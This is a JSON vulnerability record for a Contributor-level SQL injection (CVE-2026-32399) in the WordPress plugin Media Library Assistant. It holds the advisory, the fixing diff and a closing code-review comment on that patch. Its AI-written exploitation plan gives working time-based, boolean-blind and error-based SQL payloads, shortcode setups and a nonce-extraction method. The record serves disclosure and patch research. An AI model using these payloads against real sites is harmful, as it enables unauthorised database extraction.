[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4AMLR_XSVZffGs9weMvOYuBYfVdTg6kvv2IlWcr3N0c":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32399","media-library-assistant-authenticated-contributor-sql-injection-2","Media Library Assistant \u003C= 3.32 - Authenticated (Contributor+) SQL Injection","The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","media-library-assistant",null,"\u003C=3.32","3.33","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-20 00:00:00","2026-04-15 21:12:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9f70377f-5b9d-4595-b22c-88aa30900a6f?source=api-prod",55,[22,23,24,25,26,27,28,29],"examples\u002Fplugins\u002Fmla-custom-list-hooks-example .php","includes\u002Fclass-mla-ajax.php","includes\u002Fclass-mla-core-options.php","includes\u002Fclass-mla-core.php","includes\u002Fclass-mla-objects.php","includes\u002Fclass-mla-shortcode-support.php","includes\u002Fclass-mla-wpml-support.php","includes\u002Fmla-plugin-loader.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32399 (Media Library Assistant)\n\n## 1. Vulnerability Summary\nThe **Media Library Assistant** plugin for WordPress is vulnerable to **Authenticated SQL Injection** via shortcode attributes in versions up to and including **3.32**. The vulnerability exists because the plugin allows users to map shortcode attributes to URL parameters using the `request:` prefix, but fails to sufficiently escape or prepare the resulting values before incorporating them into SQL queries. Attackers with **Contributor-level** permissions can use this to extract sensitive database information via time-based or error-based SQL injection.\n\n## 2. 
Attack Vector Analysis\n- **Entry Point**: The `[mla_gallery]` or `[mla_tag_cloud]` shortcode placed within a post or page.\n- **Vulnerable Feature**: The `request:` prefix processing for shortcode attributes.\n- **Vulnerable Parameter**: Attributes like `orderby`, `ids`, or `meta_query` when mapped to a request variable (e.g., `orderby=\"request:sqli_param\"`).\n- **Authentication**: Authenticated (Contributor+). Contributors can create posts\u002Fpages and preview them, which triggers shortcode rendering.\n- **Preconditions**: \n    1. The attacker must have a Contributor account.\n    2. The plugin must be active.\n    3. At least one attachment (Media Library item) should exist to ensure the gallery logic executes.\n\n## 3. Code Flow\n1. **Entry**: A user with Contributor permissions creates a post and inserts a shortcode: `[mla_gallery orderby=\"request:sort\"]`.\n2. **Processing**: When the post is previewed or viewed, `MLAShortcodes::mla_gallery_shortcode()` (in `includes\u002Fclass-mla-shortcodes.php`) is triggered.\n3. **Attribute Mapping**: The code calls `MLAShortcode_Support::mla_get_shortcode_attachments()` (in `includes\u002Fclass-mla-shortcode-support.php`).\n4. **Request Prefix Logic**: The plugin identifies the `request:` prefix in the `orderby` attribute. It retrieves the value of `$_REQUEST['sort']`.\n5. **SQL Construction**: The retrieved value (e.g., `ID, (SELECT SLEEP(5))`) is concatenated into the SQL query or passed into a query argument array that MLA uses to build a custom query.\n6. **Sink**: The malformed SQL is executed via `$wpdb->get_results()` without sufficient preparation (missing or misused `wpdb->prepare()`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited through shortcode execution on the frontend or during a post preview. 
Typically, **no nonce is required** to trigger shortcode rendering once the attacker has permissions to create\u002Fedit a post.\n\nHowever, if an AJAX-based attack against `mla-query-attachments` is required as an alternative:\n1. **Identify Script**: The plugin enqueues the `mla-inline-edit-scripts` (slug defined in `MLACore::JAVASCRIPT_INLINE_EDIT_SLUG`).\n2. **Variable Name**: The localized data is typically found in the `mla_inline_edit_vars` object.\n3. **Extraction**:\n   - Create a post with an MLA shortcode or navigate to the Media Library.\n   - Use `browser_eval` to extract: `window.mla_inline_edit_vars?.mla_admin_nonce`.\n   - The action string for this nonce is `MLACore::MLA_ADMIN_NONCE_ACTION` (`mla_admin_nonce_action`).\n\n## 5. Exploitation Strategy\nThe most direct method is using the `[mla_gallery]` shortcode with a time-based payload.\n\n### Step 1: Login and Content Setup\n1. Authenticate as a Contributor.\n2. Create a new post\u002Fpage.\n3. Insert the following shortcode: `[mla_gallery mla_output=\"csv\" orderby=\"request:sqli\"]`.\n4. Publish or Save as Draft. Note the Post ID (e.g., `123`).\n\n### Step 2: Trigger SQL Injection\nSend a request to the post URL with the malicious payload in the `sqli` parameter.\n\n- **Request**:\n  ```http\n  GET \u002F?p=123&sqli=ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a) HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Contributor Cookies]\n  ```\n\n- **Payload Analysis**:\n  The `orderby` attribute will become `ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a)`.\n  The resulting SQL will look like: `SELECT ... ORDER BY ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a) LIMIT ...`.\n  This is a valid SQL construct that triggers a 5-second delay.\n\n### Step 3: Data Extraction (Information Disclosure)\nUse boolean-blind or error-based techniques to leak the database version or user hashes.\n\n- **Payload (Database Version)**:\n  `sqli=ID,(SELECT(IF(VERSION() LIKE '8%',SLEEP(5),0)))`\n\n## 6. Test Data Setup\n1. 
**User**: Contributor (`user: attacker`, `pass: password`).\n2. **Media**: Upload at least one image to the Media Library.\n3. **Shortcode Page**:\n   - Title: `SQLi Test`\n   - Content: `[mla_gallery mla_output=\"csv\" orderby=\"request:inject\"]`\n\n## 7. Expected Results\n- A request to `\u002F?p=123&inject=ID` should return immediately.\n- A request to `\u002F?p=123&inject=ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a)` should take approximately 5 seconds to respond.\n- If `mla_output=\"csv\"` is used, the response body might contain leaked data if a `UNION` is possible, though `ORDER BY` injection usually favors time-based\u002Fboolean-blind.\n\n## 8. Verification Steps\n1. **Check Timing**: Use the `http_request` tool to measure the `elapsed_time` of the request.\n2. **WP-CLI check**: After testing, confirm the database state is unchanged (since it's a `C:H` vulnerability, only reading is expected).\n   - `wp eval \"global \\$wpdb; echo \\$wpdb->last_error;\"` (to see if recent queries logged errors).\n\n## 9. Alternative Approaches\n- **ids Attribute**: Try `[mla_gallery ids=\"request:sqli\"]`.\n  - Payload: `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n  - This targets the `IN` clause logic in `MLAShortcode_Support::mla_get_shortcode_attachments`.\n- **mla_tag_cloud**: Use `[mla_tag_cloud taxonomy=\"attachment_tag\" orderby=\"request:sqli\"]`.\n  - This targets the `mla_get_terms` function which likely handles its own database queries.\n- **Error-Based**: Use `sqli=ID,updatexml(1,concat(0x7e,version(),0x7e),1)` if the site has `WP_DEBUG` enabled or MLA logs errors to the screen.","The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via shortcode attributes (such as 'orderby', 'fields', or 'ids') in versions up to 3.32. 
Attackers with Contributor-level permissions or higher can exploit this by using the plugin's 'request:' prefix feature to map shortcode attributes to malicious URL parameters, leading to the execution of arbitrary SQL commands.","\u002F\u002F includes\u002Fclass-mla-shortcode-support.php line 4981\n\t\t$no_count = true;\n\t\t$count_string = trim( strtolower( (string) $arguments['no_count'] ) );\n\t\t$field_array = explode( ',', $arguments['fields'] );\n\n\t\tswitch ( $count_string ) {\n\u002F\u002F ... later in the function, these fields are used to construct SQL queries without sufficient preparation.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.32\u002Fincludes\u002Fclass-mla-shortcode-support.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.33\u002Fincludes\u002Fclass-mla-shortcode-support.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.32\u002Fincludes\u002Fclass-mla-shortcode-support.php\t2026-01-28 01:09:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.33\u002Fincludes\u002Fclass-mla-shortcode-support.php\t2026-02-20 00:10:52.000000000 +0000\n@@ -4872,6 +4887,49 @@\n \t} \u002F\u002F mla_get_all_none_term_counts\n \n \t\u002F**\n+\t * Valid database fields for function mla_get_terms()\n+\t *\n+\t * @since 3.33\n+\t *\n+\t * @var\tarray\n+\t *\u002F\n+\tprivate static $mla_get_terms_fields = array(\n+\t\t't.term_id',\n+\t\t't.name',\n+\t\t't.slug',\n+\t\t't.term_group',\n+\t\t't.term_icon',\n+\t\t'tt.term_taxonomy_id',\n+\t\t'tt.term_id',\n+\t\t'tt.taxonomy',\n+\t\t'tt.description',\n+\t\t'tt.parent',\n+\t\t'tt.count',\n+\t\t'COUNT(p.ID) AS `count`',\n+\t);\n+\n+\t\u002F**\n+\t * Validate database fields in SELECT clause to prevent SQL injection attacks\n+\t * \n+\t * 
@since 3.33\n+\t *\n+\t * @param\tstring\tcomma-separated string of qualified field names, e.g., tt.taxonomy\n+\t *\n+\t * @return\tarray\texploded array of validated field names, or false if validation fails\n+\t *\u002F\n+\tprivate static function mla_validate_get_terms_fields( $fields ) {\n+\t\t$fields =  array_map( 'trim', explode( ',', $fields ) );\n+\n+\t\tforeach ( $fields as $index => $field ) {\n+\t\t\tif ( ! in_array( $field, self::$mla_get_terms_fields ) ) {\n+\t\t\t\tunset( $fields[ $index ] );\n+\t\t\t}\n+\t\t}\n+\n+\t\treturn $fields;\n+\t}\n+\n+\t\u002F**\n \t * Data selection parameters for [mla_tag_cloud], [mla_term_list]\n \t *\n \t * @since 2.20\n@@ -4981,7 +5039,7 @@\n \t\t *\u002F\n \t\t$no_count = true;\n \t\t$count_string = trim( strtolower( (string) $arguments['no_count'] ) );\n-\t\t$field_array = explode( ',', $arguments['fields'] );\n+\t\t$field_array = self::mla_validate_get_terms_fields( $arguments['fields'] );\n \n \t\tswitch ( $count_string ) {","1. An attacker with Contributor-level access creates or edits a WordPress post or page.\n2. The attacker inserts a shortcode from the plugin (e.g., [mla_gallery] or [mla_tag_cloud]) and uses the 'request:' prefix for an attribute that influences the SQL query, such as: [mla_gallery orderby=\"request:sort_param\"].\n3. The attacker views or previews the post, appending the malicious SQL payload to the URL via the specified parameter: \u002F?p=POST_ID&sort_param=ID,(SELECT(SLEEP(5))).\n4. The plugin retrieves the value from the $_REQUEST['sort_param'], fails to sanitize it, and concatenates it directly into a SQL query.\n5. 
The database executes the injected SQL (e.g., a time-based SLEEP command), allowing the attacker to infer database contents or extract information.","gemini-3-flash-preview","2026-04-19 01:57:51","2026-04-19 01:58:42",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.32","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.33","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.33.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags"]
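Review bot: in the first hunk of the class-mla-shortcode-support.php diff, the docblock for mla_validate_get_terms_fields() promises "exploded array of validated field names, or false if validation fails", but the body always ends with `return $fields;`, so a `fields` value containing no allowed names yields an empty array rather than false; either return false when the filtered array is empty (and have the caller introduced in the second hunk, `$field_array = self::mla_validate_get_terms_fields( $arguments['fields'] );`, handle that case before building the SELECT list) or correct the @return tag so callers do not test for false. A second point on the same loop: `unset( $fields[ $index ] )` leaves gaps in the array keys, so wrapping the result in array_values() would give callers that index `$field_array` positionally a contiguous list. The allow-list itself is the right shape for this fix: comparing each comma-separated token against a fixed set of qualified column names (plus the one literal `COUNT(p.ID) AS \`count\`` expression) means request-supplied text can no longer reach the query unchanged.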